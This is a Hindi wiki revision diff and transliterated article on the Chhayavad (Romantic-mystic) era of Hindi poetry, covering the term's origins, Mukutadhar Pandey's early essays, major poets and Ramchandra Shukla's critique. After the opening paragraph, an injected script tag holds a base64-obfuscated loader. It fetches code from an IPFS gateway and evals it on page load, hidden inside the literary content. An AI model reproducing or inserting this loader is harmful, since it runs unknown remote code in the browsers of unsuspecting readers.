Difference between revisions of "छायावादी युग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 6: Line 6:
 
'छायावाद' शब्द का प्रयोग दो अर्थों में समझना चाहिए-
 
'छायावाद' शब्द का प्रयोग दो अर्थों में समझना चाहिए-
 
*एक तो रहस्यवाद के अर्थ में, जहाँ उसका संबंध काव्यवस्तु से होता है अर्थात् जहाँ [[कवि]] उस अनंत और अज्ञात प्रियतम को आलंबन बनाकर अत्यंत चित्रमयी भाषा में प्रेम की अनेक प्रकार से व्यंजना करता है। रहस्यवाद के अंतर्भूत रचनाएँ पहुँचे हुए पुराने संतों या साधकों की उसी वाणी के अनुकरण पर होती हैं, जो तुरीयावस्था या समाधि दशा में नाना रूपकों के रूप में उपलब्ध आध्यात्मिक ज्ञान का आभास देती हुई मानी जाती थी। इस रूपात्मक आभास को [[यूरोप]] में 'छाया'<ref>फैंटसमाटा</ref> कहते थे। इसी से [[बंगाल]] में '[[ब्रह्मसमाज]]' के बीच उक्त वाणी के अनुकरण पर जो आध्यात्मिक गीत या भजन बनते थे, वे 'छायावाद' कहलाने लगे। धीरे-धीरे यह शब्द धार्मिक क्षेत्र से वहाँ के [[साहित्य]] क्षेत्र में आया और फिर रवींद्र बाबू की धूम मचने पर [[हिन्दी]] के साहित्य क्षेत्र में भी प्रकट हुआ।
 
*एक तो रहस्यवाद के अर्थ में, जहाँ उसका संबंध काव्यवस्तु से होता है अर्थात् जहाँ [[कवि]] उस अनंत और अज्ञात प्रियतम को आलंबन बनाकर अत्यंत चित्रमयी भाषा में प्रेम की अनेक प्रकार से व्यंजना करता है। रहस्यवाद के अंतर्भूत रचनाएँ पहुँचे हुए पुराने संतों या साधकों की उसी वाणी के अनुकरण पर होती हैं, जो तुरीयावस्था या समाधि दशा में नाना रूपकों के रूप में उपलब्ध आध्यात्मिक ज्ञान का आभास देती हुई मानी जाती थी। इस रूपात्मक आभास को [[यूरोप]] में 'छाया'<ref>फैंटसमाटा</ref> कहते थे। इसी से [[बंगाल]] में '[[ब्रह्मसमाज]]' के बीच उक्त वाणी के अनुकरण पर जो आध्यात्मिक गीत या भजन बनते थे, वे 'छायावाद' कहलाने लगे। धीरे-धीरे यह शब्द धार्मिक क्षेत्र से वहाँ के [[साहित्य]] क्षेत्र में आया और फिर रवींद्र बाबू की धूम मचने पर [[हिन्दी]] के साहित्य क्षेत्र में भी प्रकट हुआ।
*'छायावाद' शब्द का दूसरा प्रयोग काव्य शैली या पद्ध तिविशेष के व्यापक अर्थ में है। सन [[1885]] में [[फ़्राँस]] मंी रहस्यवादी कवियों का एक दल खड़ा हुआ, जो प्रतीकवाद कहलाया। वे अपनी रचनाओं में प्रस्तुतों के स्थान पर अधिकतर अप्रस्तुत प्रतीकों को लेकर चलते थे। इसी से उनकी शैली की ओर लक्ष्य करके 'प्रतीकवाद' शब्द का व्यवहार होने लगा। आध्यात्मिक या ईश्वर प्रेम संबंधी कविताओं के अतिरिक्त और सब प्रकार की कविताओं के लिए भी प्रतीक शैली की ओर वहाँ प्रवृत्ति रही। हिन्दी में 'छायावाद' शब्द का जो व्यापक अर्थ में, रहस्यवादी रचनाओं के अतिरिक्त और प्रकार की रचनाओं के संबंध में भी, ग्रहण हुआ, वह इसी प्रतीक शैली के अर्थ में। छायावाद का सामान्यत: अर्थ हुआ "प्रस्तुत के स्थान पर उसकी व्यंजना करने वाली छाया के रूप में अप्रस्तुत का कथन"। इस शैली के भीतर किसी वस्तु या विषय का वर्णन किया जा सकता है।<ref>{{cite web |url=http://www.hindisamay.com/Alochana/shukl%20granthavali5/itihas%20shukl14a.htm|title=छायावाद|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
*'छायावाद' शब्द का दूसरा प्रयोग काव्य शैली या पद्ध तिविशेष के व्यापक अर्थ में है। सन [[1885]] में [[फ़्राँस]] मंी रहस्यवादी कवियों का एक दल खड़ा हुआ, जो प्रतीकवाद कहलाया। वे अपनी रचनाओं में प्रस्तुतों के स्थान पर अधिकतर अप्रस्तुत प्रतीकों को लेकर चलते थे। इसी से उनकी शैली की ओर लक्ष्य करके 'प्रतीकवाद' शब्द का व्यवहार होने लगा। आध्यात्मिक या ईश्वर प्रेम संबंधी कविताओं के अतिरिक्त और सब प्रकार की कविताओं के लिए भी प्रतीक शैली की ओर वहाँ प्रवृत्ति रही। हिन्दी में 'छायावाद' शब्द का जो व्यापक अर्थ में, रहस्यवादी रचनाओं के अतिरिक्त और प्रकार की रचनाओं के संबंध में भी, ग्रहण हुआ, वह इसी प्रतीक शैली के अर्थ में। छायावाद का सामान्यत: अर्थ हुआ "प्रस्तुत के स्थान पर उसकी व्यंजना करने वाली छाया के रूप में अप्रस्तुत का कथन"। इस शैली के भीतर किसी वस्तु या विषय का वर्णन किया जा सकता है।<ref name="bb">{{cite web |url=http://www.hindisamay.com/Alochana/shukl%20granthavali5/itihas%20shukl14a.htm|title=छायावाद|accessmonthday=01 अक्टूबर|accessyear=2013 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
==मुख्य कवि==
 
==मुख्य कवि==
 
'छायावाद' का केवल पहला अर्थात मूल अर्थ लेकर तो हिन्दी काव्य क्षेत्र में चलने वाली [[महादेवी वर्मा]] ही हैं। [[जयशंकर प्रसाद]], [[सूर्यकांत त्रिपाठी 'निराला']], [[सुमित्रानंदन पंत]] और [[महादेवी वर्मा]] इस युग के चार प्रमुख स्तंभ हैं। [[रामकुमार वर्मा]], [[माखनलाल चतुर्वेदी]], [[हरिवंशराय बच्चन]] और [[रामधारी सिंह दिनकर]] को भी 'छायावाद' ने प्रभावित किया। किंतु रामकुमार वर्मा आगे चलकर नाटककार के रूप में प्रसिद्ध हुए, माखनलाल चतुर्वेदी राष्ट्रवादी धारा की ओर रहे, बच्चन ने प्रेम के राग को मुखर किया और दिनकर जी ने विद्रोह की आग को आवाज़ दी। जयशंकर प्रसाद, सुमित्रानन्दन पन्त और सूर्यकांत त्रिपाठी 'निराला' इत्यादि और सब कवि प्रतीक पद्धति या चित्रभाषा शैली की दृष्टि से ही छायावादी कहलाए। छायावादी युग के प्रमुख कवि थे-
 
'छायावाद' का केवल पहला अर्थात मूल अर्थ लेकर तो हिन्दी काव्य क्षेत्र में चलने वाली [[महादेवी वर्मा]] ही हैं। [[जयशंकर प्रसाद]], [[सूर्यकांत त्रिपाठी 'निराला']], [[सुमित्रानंदन पंत]] और [[महादेवी वर्मा]] इस युग के चार प्रमुख स्तंभ हैं। [[रामकुमार वर्मा]], [[माखनलाल चतुर्वेदी]], [[हरिवंशराय बच्चन]] और [[रामधारी सिंह दिनकर]] को भी 'छायावाद' ने प्रभावित किया। किंतु रामकुमार वर्मा आगे चलकर नाटककार के रूप में प्रसिद्ध हुए, माखनलाल चतुर्वेदी राष्ट्रवादी धारा की ओर रहे, बच्चन ने प्रेम के राग को मुखर किया और दिनकर जी ने विद्रोह की आग को आवाज़ दी। जयशंकर प्रसाद, सुमित्रानन्दन पन्त और सूर्यकांत त्रिपाठी 'निराला' इत्यादि और सब कवि प्रतीक पद्धति या चित्रभाषा शैली की दृष्टि से ही छायावादी कहलाए। छायावादी युग के प्रमुख कवि थे-
Line 39: Line 39:
 
====शुक्लजी का स्वच्छंदतावाद====
 
====शुक्लजी का स्वच्छंदतावाद====
 
छायावादी कविताओं की आलोचना-प्रत्यालोचना के सिलसिले में जिस समय [[अंग्रेज़ी]] का ‘मिस्टिसिज्म’ शब्द आया, उसके कुछ ही दिन बाद ‘रोमैटिसिज्म’ शब्द आ गया। [[रामचन्द्र शुक्ल]] ने इसका [[हिन्दी]] अनुवाद स्वच्छंदतावाद किया और श्रीधर पाठक, [[रामनरेश त्रिपाठी]] आदि को स्वच्छंदतावादी कवि कहा। इस तरह शुक्ल जी ने ‘स्वच्छंदतावाद’ और ‘छायावाद’ में अंतर किया। वे छायावाद को ‘रोमैंटिसिज्म’ कहने के पक्ष में नहीं थे। आश्चर्य की बात है कि प्रसाद, पंत, निराला की शैली इत्यादि से प्रभावित मानते हुए भी शुक्ल जी उन्हें रोमैंटिक मानने से इनकार करते थे। परंतु यहाँ भी शुक्ल जी का द्वैतवाद न चल सका। कवि, आलोचक और सामान्य पाठक 'छायावाद' को रोमैंटिसिज्म का पर्याय समझने लगे। कुछ लोग शुक्ल जी द्वारा गढ़े हुए 'स्वच्छंदतावाद' को भी 'छायावाद' का पर्याय अथवा अंग मानने लगे तथा अन्य लोग 'छायावाद' को 'स्वच्छंदतावाद' का द्वितीय उत्थान कहना अधिक युक्ति संगत मानने लगे थे।
 
छायावादी कविताओं की आलोचना-प्रत्यालोचना के सिलसिले में जिस समय [[अंग्रेज़ी]] का ‘मिस्टिसिज्म’ शब्द आया, उसके कुछ ही दिन बाद ‘रोमैटिसिज्म’ शब्द आ गया। [[रामचन्द्र शुक्ल]] ने इसका [[हिन्दी]] अनुवाद स्वच्छंदतावाद किया और श्रीधर पाठक, [[रामनरेश त्रिपाठी]] आदि को स्वच्छंदतावादी कवि कहा। इस तरह शुक्ल जी ने ‘स्वच्छंदतावाद’ और ‘छायावाद’ में अंतर किया। वे छायावाद को ‘रोमैंटिसिज्म’ कहने के पक्ष में नहीं थे। आश्चर्य की बात है कि प्रसाद, पंत, निराला की शैली इत्यादि से प्रभावित मानते हुए भी शुक्ल जी उन्हें रोमैंटिक मानने से इनकार करते थे। परंतु यहाँ भी शुक्ल जी का द्वैतवाद न चल सका। कवि, आलोचक और सामान्य पाठक 'छायावाद' को रोमैंटिसिज्म का पर्याय समझने लगे। कुछ लोग शुक्ल जी द्वारा गढ़े हुए 'स्वच्छंदतावाद' को भी 'छायावाद' का पर्याय अथवा अंग मानने लगे तथा अन्य लोग 'छायावाद' को 'स्वच्छंदतावाद' का द्वितीय उत्थान कहना अधिक युक्ति संगत मानने लगे थे।
 +
====अन्योक्तिपद्धति का अवलंबन====
 +
चित्रभाषा शैली या प्रतीक पद्धति के अंतर्गत जिस प्रकार वाचक पदों के स्थान पर लक्षक पदों का व्यवहार आता है, उसी प्रकार प्रस्तुत के स्थान पर उसकी व्यंजना करने वाले अप्रस्तुत चित्रों का विधान भी। अत: अन्योक्तिपद्धति का अवलंबन भी 'छायावाद' का एक विशेष लक्षण हुआ। जैसा कि कहा गया है कि 'छायावाद' का चलन 'द्विवेदी युग' की रूखी इतिवृत्तात्मकता की प्रतिक्रिया के रूप में हुआ था। अत: इस प्रतिक्रिया का प्रदर्शन केवल लक्षण और अन्योक्ति के प्राचुर्य के रूप में ही नहीं, कहीं-कहीं उपमा और उत्प्रेक्षा की भरमार के रूप में भी हुआ। इनमें से उपादान और लक्षण लक्षणाओं को छोड़ और सब बातें किसी न किसी प्रकार की साम्य भावना के आधार पर ही खड़ी होने वाली हैं। साम्य को लेकर अनेक प्रकार की अलंकृत रचनाएँ बहुत पहले भी होती थीं तथा '[[रीतिकाल]]' के और उसके पीछे भी होती रही हैं। अत: 'छायावाद' की रचनाओं के भीतर साम्य ग्रहण की उस प्रणाली का निरूपण आवश्यक है, जिसके कारण उसे एक विशिष्ट रूप प्राप्त हुआ।<ref name="bb"/>
 +
==रचनाएँ==
 +
'छायावाद' की रचनाएँ गीतों के रूप में ही अधिकतर होती हैं। इससे उनमें अन्विति कम दिखाई पड़ती है। जहाँ यह अन्विति होती है, वहाँ समूची रचना अन्योक्ति पद्धति पर की जाती है। इस प्रकार साम्य भावना का ही प्राचुर्य हम सर्वत्र पाते हैं। यह साम्य भावना हमारे [[हृदय]] का प्रसार करने वाली, शेष सृष्टि के साथ मनुष्य के गूढ़ संबंध की धारणा बँधाने वाली, अत्यंत अपेक्षित मनोभूमि है, इसमें संदेह नहीं, पर यह सच्चा मार्मिक प्रभाव वहीं उत्पन्न करती है, जहाँ यह प्राकृतिक वस्तु या व्यापार से प्राप्त सच्चे आभास के आधार पर खड़ी होती है। प्रकृति अपने अनंत रूपों और व्यापारों के द्वारा अनेक बातों की गूढ़ वा अगूढ़ व्यंजना करती रहती है। इस व्यंजना को न परखकर या न ग्रहण करके जो साम्य विधान होगा, वह मनमाना आरोप मात्र होगा। इस अनंत विश्व महाकाव्य की व्यंजनाओं की परख के साथ जो साम्य विधान होता है, वह मार्मिक और उद्बोधाक होता है, जैसे- 
 +
<blockquote><poem>दुखदावा से नवअंकुर पाता जग जीवन का वन
 +
करुणार्द्र विश्व का गर्जन बरसाता नवजीवन कण।
 +
खुल खुल नव इच्छाएं फैलाती जीवन के दल। 
 +
यह शैशव का सरल हास है, सहसा उर में है आ जाता। 
 +
यह ऊषा का नवविकास है, जो रज को है रजत बनाता। 
 +
यह लघु लहरों का विलास है, कलानाथ जिसमें खिंच आता।</poem>
 +
</blockquote>
 +
==साम्य==
 +
हमारे यहाँ साम्य मुख्यत: तीन प्रकार का माना गया है-
 +
#सादृश्य - रूप या आकार का साम्य
 +
#साधार्म्य - गुण या क्रिया का साम्य
 +
#शब्दसाम्य - दोभिन्न वस्तुओं का एक ही नाम होना।
 +
 +
इसमें से अंतिम तो श्लेष की शब्द क्रीड़ा दिखाने वालों के ही काम का है। रहे सादृश्य और साधार्म्य। विचार करने पर इन दोनों में प्रभाव साम्य छिपा मिलेगा। सिद्ध कवियों की दृष्टि ऐसे ही अप्रस्तुतों की ओर जाती है, जो प्रस्तुतों के समान ही सौंदर्य, दीप्ति, कांति, कोमलता, प्रचंडता, भीषणता, उग्रता, उदासी, अवसाद, खिन्नता इत्यादि की भावना जगाते हैं। काव्य में बँधे चले आते हुए उपमान अधिकतर इसी के हैं। केवल रूप रंग, आकार या व्यापार को ऊपर से देखकर या नाप जोखकर, भावना पर उनका प्रभाव परखे बिना वे नहीं रखे जाते थे। पीछे कवि कर्म के बहुत कुछ श्रमसाध्य या अभ्यासगम्य होने के कारण जब कृत्रिमता आने लगी, तब बहुत से उपमान केवल बाहरी नाप जोख के अनुसार भी रखे जाने लगे। कटि की सूक्ष्मता दिखाने के लिए सिंहनी और भिड़ सामने लाई जाने लगी।<ref name="bb"/>
 +
====काव्य शैली की विशेषता====
 +
'छायावाद' बड़ी सहृदयता के साथ प्रभाव साम्य पर ही विशेष लक्ष्य रखकर चला है। कहीं-कहीं तो बाहरी सादृश्य या साधार्म्य अत्यंत अल्प या न रहने पर भी आभ्यंतर प्रभाव साम्य लेकर अप्रस्तुतों का सन्निवेश कर दिया जाता है। ऐसे अप्रस्तुत अधिकतर उपलक्षण के रूप में या प्रतीकवत होते हैं, जैसे- सुख, आनंद, प्रफुल्लता, यौवन काल इत्यादि के स्थान पर उनके द्योतक उषा, प्रभात, मधुकाल, प्रिया के स्थान पर मुकुल; प्रेमी के स्थान पर मधुप; श्वेत या शुभ्र के स्थान पर कुंद, रजत; माधुर्य के स्थान पर मधु; दीप्तिमान या कांतिमान के स्थान पर स्वर्ण; विषाद या अवसाद के स्थान पर अंधकार, अंधेरी रात, संधया की छाया, पतझड़, मानसिक आकुलता या क्षोभ के स्थान पर झंझा, तूफान, भावतरंग के लिए झंकार, भावप्र्रवाह के लिए [[संगीत]] या [[मुरली]] का स्वर इत्यादि। आभ्यंतर प्रभाव साम्य के आधार पर लाक्षणिक और व्यंजनात्मक पद्धति का प्रगल्भ और प्रचुर विकास 'छायावाद' की काव्य शैली की असली विशेषता है।
  
  

Revision as of 09:54, 1 October 2013

chhayavadi yug (1918-1937) pray: 'dvivedi yug' ke bad ke samay ko kaha jata hai. 'dvivedi yug' ki pratikriya ka parinam hi 'chhayavad' hai. is yug mean hindi sahity mean gady gitoan, bhav taralata, rahasyatmak aur marmasparshi kalpana, rashtriyata aur svatantr chintan adi ka samavesh hota chala gaya. san 1916 ee. ke as-pas hindi mean kalpanapoorn, svachchhand aur bhavukata ki ek lahar um d p di. bhasha, bhav, shaili, chhand, alankar in sab drishtiyoan se purani kavita se isaka koee mel nahian tha. alochakoan ne ise 'chhayavad' ya 'chhayavadi kavita' ka nam diya. 'chhayavad' shabd ka sabase pahale prayog mukutadhar pandey ne kiya. is yug ki hindi kavita ke aantarang aur bahirang mean ekadam parivartan ho gaya. vastu niroopan ke sthan par anubhooti niroopan ko pradhanata prapt huee thi. prakriti ka pranamay pradesh kavita mean aya. jayashankar prasad, sooryakaant tripathi 'nirala', sumitranandan pant aur mahadevi varma is yug ke char pramukh stanbh haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

prarambh

'chhayavad' ka prarambh samanyatah 1918 ee. ke asapas se mana jata hai. tatkalin patr-patrikaoan se pata chalata hai ki 1920 tak chhayavad sanjna ka prachalan ho chuka tha. mukutadhar paandey ne 1920 ki julaee, sitanbar, navanbar aur disanbar ki 'shrisharada' (jabalapur) mean 'hindi mean chhayavad' namak shirshak se char nibandhoan ki ek lekhamala chhapavaee thi. jab tak kisi prachinatar samagri ka pata nahian chalata, isi ko chhayavad-sanbandhi sarvapratham nibandh kaha ja sakata hai. hindi mean usaka nitaant abhav dekhakar mukutadhar ji ne idhar-udhar ki kuchh tika-tippaniyoan ke sahare vah nibandh prastut kiya tha. isase spasht hai ki us nibandh se pahale bhi chhayavad par kuchh tika-tippaniyaan ho chuki thian. lekhamala ka pratham nibandh 'kavi svatantry' mean mukutadhar ji ne riti-granthoan ki paratantrata se mukt hokar kavita mean vyaktiv tatha bhav bhasha chhand prakashan-riti adi mean maulikata ki avashyakata par jor diya hai. doosara nibandh 'chhayavad kya hai?' sabase mahattvapoorn hai. aranbh mean hi lekhak kahata hai- "aangrezi ya kisi pashchaty sahity athava bang sahity ki vartaman sthiti ki kuchh bhi janakari rakhane vale to sunate hi samajh jaeange ki yah shabd mistisijm’ ke lie aya hai phir bhi chhayavad ek aisi mayamay sookshm vastu hai ki shabdoan dvara isaka thik-thik varnan karana asanbhav hai, kyoanki aisi rachanaoan mean shabd apane svabhavik mooly ko khokar saanketik chihn matr hua karate haian."[1]

'chhayavad' shabd ka prayog

'chhayavad' shabd ka prayog do arthoan mean samajhana chahie-

  • ek to rahasyavad ke arth mean, jahaan usaka sanbandh kavyavastu se hota hai arthath jahaan kavi us anant aur ajnat priyatam ko alanban banakar atyant chitramayi bhasha mean prem ki anek prakar se vyanjana karata hai. rahasyavad ke aantarbhoot rachanaean pahuanche hue purane santoan ya sadhakoan ki usi vani ke anukaran par hoti haian, jo turiyavastha ya samadhi dasha mean nana roopakoan ke roop mean upalabdh adhyatmik jnan ka abhas deti huee mani jati thi. is roopatmak abhas ko yoorop mean 'chhaya'[2] kahate the. isi se bangal mean 'brahmasamaj' ke bich ukt vani ke anukaran par jo adhyatmik git ya bhajan banate the, ve 'chhayavad' kahalane lage. dhire-dhire yah shabd dharmik kshetr se vahaan ke sahity kshetr mean aya aur phir raviandr baboo ki dhoom machane par hindi ke sahity kshetr mean bhi prakat hua.
  • 'chhayavad' shabd ka doosara prayog kavy shaili ya paddh tivishesh ke vyapak arth mean hai. san 1885 mean fraans mani rahasyavadi kaviyoan ka ek dal kh da hua, jo pratikavad kahalaya. ve apani rachanaoan mean prastutoan ke sthan par adhikatar aprastut pratikoan ko lekar chalate the. isi se unaki shaili ki or lakshy karake 'pratikavad' shabd ka vyavahar hone laga. adhyatmik ya eeshvar prem sanbandhi kavitaoan ke atirikt aur sab prakar ki kavitaoan ke lie bhi pratik shaili ki or vahaan pravritti rahi. hindi mean 'chhayavad' shabd ka jo vyapak arth mean, rahasyavadi rachanaoan ke atirikt aur prakar ki rachanaoan ke sanbandh mean bhi, grahan hua, vah isi pratik shaili ke arth mean. chhayavad ka samanyat: arth hua "prastut ke sthan par usaki vyanjana karane vali chhaya ke roop mean aprastut ka kathan". is shaili ke bhitar kisi vastu ya vishay ka varnan kiya ja sakata hai.[3]

mukhy kavi

'chhayavad' ka keval pahala arthat mool arth lekar to hindi kavy kshetr mean chalane vali mahadevi varma hi haian. jayashankar prasad, sooryakaant tripathi 'nirala', sumitranandan pant aur mahadevi varma is yug ke char pramukh stanbh haian. ramakumar varma, makhanalal chaturvedi, harivansharay bachchan aur ramadhari sianh dinakar ko bhi 'chhayavad' ne prabhavit kiya. kiantu ramakumar varma age chalakar natakakar ke roop mean prasiddh hue, makhanalal chaturvedi rashtravadi dhara ki or rahe, bachchan ne prem ke rag ko mukhar kiya aur dinakar ji ne vidroh ki ag ko avaz di. jayashankar prasad, sumitranandan pant aur sooryakaant tripathi 'nirala' ityadi aur sab kavi pratik paddhati ya chitrabhasha shaili ki drishti se hi chhayavadi kahalae. chhayavadi yug ke pramukh kavi the-

  1. raykrishna das
  2. viyogi hari
  3. d aau. raghuvir sahay
  4. makhanalal chaturvedi
  5. jayashankar prasad
  6. mahadevi varma
  7. nand dulare vajapeyi
  8. d aau. shivapoojan sahay
  9. sooryakant tripathi nirala
  10. ramachandr shukl
  11. padumalal punnalal bakhshi
  12. baboo gulabaray

"chhayavad ke kavi vastuoan ko asadharan drishti se dekhate haian. unaki rachana ki sanpoorn visheshataean unaki is ‘drishti’ par hi avalanbit rahati haian....vah kshan-bhar mean bijali ki tarah vastu ko sparsh karati huee nikal jati hai....asthirata aur kshinata ke sath usamean ek tarah ki vichitr unmadakata aur aantarangata hoti hai, jisake karan vastu usake prakrit roop mean nahian kiantu ek any roop mean dikh p dati hai. usake is any roop ka sanbandh kavi ke aantarjagat se rahata hai....yah aantarang drishti hi ‘chhayavad’ ki vichitr prakashan riti ka mool hai." is prakar mukutadhar paandey ki sookshm drishti ne ‘chhayavad’ ki mool bhavana ‘atmanishth aantardrishti’ ko pahachan liya tha. jab unhoanne kaha ki "chitr drishy vastu ki atma ka hi utara jata hai," to chhayavad ki maulik visheshata ki or sanket kiya. chhayavadi kaviyoan ki kalpanapriyata par prakash dalate hue mukutadhar ji kahate haian- "unaki kavita devi ki aankhean sadaiv oopar ki hi or uthi rahati haian; martyalok se usaka bahut kam sanbandh rahata hai; vah buddhi aur jnan ki samarthy-sima ko atikram karake man-pran ke atit lok mean hi vicharan karati rahati hai."[1] yahian chhayavadita se adhyatmikata tatha dharm-bhavukata ka mel hota hai, yatharth mean usake jivan ke ye do mukhy avalanb haian.

mukutadhar paandey ka nibandh

'chhayavad' mean prakriti ka upayog prayah pratik ki tarah hota hai, is tathy ki or sanket karate hue mukutadhar ji kahate haian ki "prakritik drishy aur ghatanaean saanketik roop mean adrishy tatha avyakt ke prakashan mean sahayy pahuanchati haian." 'chhayavad' ke kalapaksh par vichar karate hue mukutadhar ji kavy mean chitrakari aur sangit ka apoorv ekikaran usaka adarsh manate haian. lekhamala ke shesh do nibandhoan ka ek hi shirshak hai- 'hindi mean chhayavad'. inamean chhayavad par lagae ge ‘aspashtata’ adi aropoan ka spashtikaran karate hue aant mean mukutadhar paandey ne likha hai- "chhayavad ki avashyakata ham isilie samajhate haian ki usase kaviyoan ko bhav-prakashan ka ek naya marg milega. is prakar ke anek margoan-anek ritiyoan ka hona hi unnat sahity ka lakshan hai." mukutadhar paandey ka nibandh 'chhayavad' par pahala nibandh hone ke sath hi atyant soojh-boojh bhari ganbhir samiksha bhi hai. is nibandh ka aitihasik mahattv hi nahian, balki sthayi mahattv bhi hai.

pratham ullekh

us yug ki pratinidhi patrika 'sarasvati' mean 'chhayavad' ka sarvapratham ullekh joon 1921 ke aank mean milata hai. kisi sushil kumar ne ‘hindi mean chhayavad’ shirshak se ek sanvadatmak nibandh likha hai. sanvad mean bhag lene vale kul char vyakti haian- brahm kanya vidyalay mean uchch shiksha prapt sushila devi, unake arasik kiantu lakshmi ke kripapatr pati harikishor baboo, chitrakar ramanaresh joshi aur kavi-samrat sumitranandan pant. pahale keval pratham tin vyaktiyoan mean joshi ji ke ek ‘chhaya-chitr’ par batachit hoti hai, jise unhoanne pant ji ki ek kavita ke adhar par banaya hai. chitr ke nam par badhiya phrem mean madha kora kagaz hai aur usake niche likha hai ‘chhaya’. harikishor baboo ke anusar vah nirmal brahma ki vishad chhaya hai. svayan joshi ji ne bhi usamean kisi prakar anant ki aspashtata ko spasht karane ka prayatn kiya tha. aant mean pant ji ate haian aur ve bhi kavita ke nam par ek ‘kora kagaz' prastut karate haian, jisaka adhar joshi ji ka vahi chitr hai. harikishor baboo ke shabdoan mean "yah to vani ki niravata hai, nistabdhata ka uchchhvas hai, pratibha ka vilas hai, aur anant ka vilas hai." kavi samrat apane vaktavy mean kahate haian- "chhayavad ka pradhan gun hai aspashtata. bhav itane spasht ho jaean ki ve kalpana ke anant garbh mean lin ho jaean. meri yah sammati hai ki shabd aksharoan se banate haian aur akshar, avinashi hai. vah to ajney hai, anant hai. atev hamean bhasha ko vah roop dena chahie, jisase vah nirav ho jae. vah karnashrut n hokar hridayagamy ho, iandriyagochar n hokar atma se grahy ho."[1]

kavita

adhunik hindi kavita ki sarvashreshth upalabdhi chhayavadi kal ki kavita mean milati hai. lakshanikata, chitramayata, nootan pratik vidhan, vyangyatmakata, madhurata tatha sarasata adi gunoan ke karan chhayavadi kavita ne dhire-dhire apana ek prashansak varg kh da kar diya. mukutadhar paandey ne sarvapratham 'chhayavad' shabd ka prayog kiya tha. shabd chayan aur komalakaant padavali ke karan 'itivrittatmak'[4] yug ki khuradari kh di boli sauandary, prem aur vedana ke gahan bhavoan ko vahan karane yogy bani. hindi kavita ke aantarang aur bahirang mean ekadam parivartan ho gaya. vastu niroopan ke sthan par anubhooti niroopan ko pramukhata mili. prakriti ka pranamay pradesh kavita mean aya. 'dvivedi yug' mean rashtriyata ke prabal svar mean prem aur saundary ki komal bhavanaean dab-si gayi thian. in saras komal manovritiyoan ko vyakt karane ke lie kavi-hriday vidroh kar utha. hriday ki anubhootiyoan tatha darshanik vicharoan ki marmik abhivyakti ke parinamasvaroop hi 'chhayavad' ka janm hua. chhayavad kavyadhara ne hindi ko shushk prachar se bachaya. hindi ki kh di boli ki kavita ko saundary aur sarasata pradan ki. chhayavad ne hindi ko jayashankar prasad, sumitranandan pant aur sooryakaant tripathi 'nirala' jaise mahakavi die. 'pallav', 'kamayani' aur 'ram ki shaktipooja' chhayavad ki mahan upalabdhi haian.[5]

us samay ke log 'chhayavad' ki kavita ko taigor-skool ke chhayachitroan ke sath rakhakar dekhate the. is tarah un kavitaoan ke lie hindi mean 'chhayavad' aur aangrezi mean ‘mistisijm’ shabd chal p de aur in donoan mean bhi hindi chhayavad adhik prachalit hua. parantu jaisa ki sukavi achary mahavir prasad dvivedi ke mee, 1927 ee. ki 'sarasvati' mean prakashit 'ajakal ke hindi kavi aur kavita' shirshak nibandh se pata chalata hai, chhayavad aur ‘mistisijm’ paryay nahian samajhe jate the. achary ki samajh mean nahian ata tha ki in kavitaoan ko ‘mistasijm’ kyoan kaha jata hai, kyoanki pan. mathura prasad dikshit ke 'traibhashik kosh' ke anusar 'mistik' ka arth hota hai 'goodharth guhy', 'gupt gopy', 'rahasy' adi. idhar in kavitaoan mean achary dvivedi ko adhyatmik rahasy dikhaee hi nahian p data tha. raviandranath ki kavitaoan mean to ve 'adhyatmik rahasy' man lete the; parantu hindi kaviyoan ke prati ve shankalu the. isalie unake anusar pant, paandey adi ki kavitaean chhayavadi hi thian. chhayavad ka arth thik-thik n samajhate hue bhi ve un kavitaoan ko chhayavadi manate the. kahate haian- "chhayavad se logoan ka kya matalab hai, kuchh samajh mean nahian ata. shayad unaka matalab hai ki kisi kavita ke bhavoan ki chhaya yadi kahian anyatr-jakar p de to use chhayavadi kavita kahana chahie." unake vichar se ‘anyokti-paddhati’ hi chhayavad hai. is tarah achary un kavitaoan aur chhayavad sanjna mean sanbandh sthapit karake donoan mean nihit arth ko pak dane ki koshish kar rahe the. dhyan dene ki bat hai ki achary dvivedi ne 'rahasy' shabd ko to oopar kiya, parantu rahasyavad shabd ka prayog nahian kiya.

rahasyavad shabd ka prachalan

lagabhag do sal bad 1929 ee. mean achary ramachandr shukl ka 'kavy mean rahasyavad' nibandh pustakakar nikala, jisase pata chalata hai ki ‘rahasyavad’ shabd ka prachalan pahale se ho chuka tha. sumitranandan pant ka 'pallav' tab tak nikal gaya tha. shukl ji ke nibandh se pata chalata hai ki unaka dhyan mukhyatah pant ji ki un kavitaoan par keandrit tha, jinamean rahasy ke prati prayah jijnasa aur kahian-kahian lalasa vyakt ki gee thi. unake anusar ajnat ke prati jijnasa hi sachchi rahasy-bhavana hai. parantu unhoanne dekha ki chhayavadi kavi us jijnasa ko adhyatmikata ka roop de rahe haian; isalie rahasyavadi rahasy-bhavana ko unhoanne saanpradayik athava adhyatmik rahasyavad samajh liya. unhean chhayavad ki is adhyatmikata ka mool srot raviandranath mean dikhaee p da aur chooanki raviandranath brahm the aur brahmoan ka mat eesaee dharm se jyada milata tha, isalie shukl ji ne in sab mean ek tarah ka badarayan sanbandh sthapit kar liya. ve is nishkarsh par pahuanche ki eesaee dharm ki hi adhyatmikata bahm madhyam se hindi kavita mean vyakt ho rahi hai. jab mool bhav ki ekasootrata sthapit ho gee to unhoanne chhayavad nam ke sath bhi usaka mel mila diya. buddhi ho to adami kya nahian kar sakata! unhean eesaee mat mean chhaya arth dene vala ek 'phaiantasamaita' shabd bhi mil gaya. bas phir kya tha, unhoanne chhayavad shabd ko usase jo d diya aur sabit kar diya ki 'chhayavad' nam aur bhav-dhara donoan drishtiyoan se yoorop ka prabhav hai. jis tarah unhoanne yooropiy aur hindi adhyatmikata ke bich mean bangala ko madhyam mana; usi tarah unhoanne hindi chhayavad aur eesaee ‘phaiantasamaita’ ke bich ki bangala k di ki bhi kalpana kar dali 